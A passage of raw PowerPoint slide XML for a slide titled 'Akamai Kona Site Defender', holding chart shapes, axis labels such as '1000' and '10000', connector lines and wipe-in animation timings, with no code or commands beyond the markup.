              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Text Box 142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1561639" y="5534980"/>
            <a:ext cx="776187" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Rectangle 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1217710" y="6880860"/>
            <a:ext cx="174285" cy="299086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Rectangle 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2619731" y="6290310"/>
            <a:ext cx="167998" cy="862920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Title 587"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1008281" y="446183"/>
            <a:ext cx="11535805" cy="805816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="54842" tIns="27420" rIns="54842" bIns="27420" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="548494" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Akamai Kona Site Defender</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Rectangle 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2630586" y="5247252"/>
            <a:ext cx="145714" cy="887803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="524" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4034266" y="5887419"/>
            <a:ext cx="1939304" cy="777702"/>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25" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4299978" y="2596326"/>
            <a:ext cx="4285170" cy="1412746"/>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26" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8311990" y="3496730"/>
            <a:ext cx="2427003" cy="117993"/>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32" name="Rectangle 130"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2620060" y="6169201"/>
            <a:ext cx="167998" cy="992459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00FF00"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20281592" flipV="1">
            <a:off x="4093237" y="3657327"/>
            <a:ext cx="3878139" cy="587161"/>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492" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20964075">
            <a:off x="8465745" y="3258688"/>
            <a:ext cx="1996985" cy="620978"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3277702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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="524"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="2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6"/>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52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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="559"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="559"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="556"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="556"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="554"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="554"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="553"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="553"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="552"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="552"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="47" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36348"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="50" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36349"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36349"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36336"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36336"/>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36323"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36323"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36335"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36335"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="595"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59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right)">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525"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="525"/>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52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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="82" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="273"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="273"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="85" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="558"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="558"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="88" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="566"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="566"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="91" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="36350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="363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right)">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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526"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52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490"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="490"/>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526"/>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49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22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="555"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="555"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="120" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
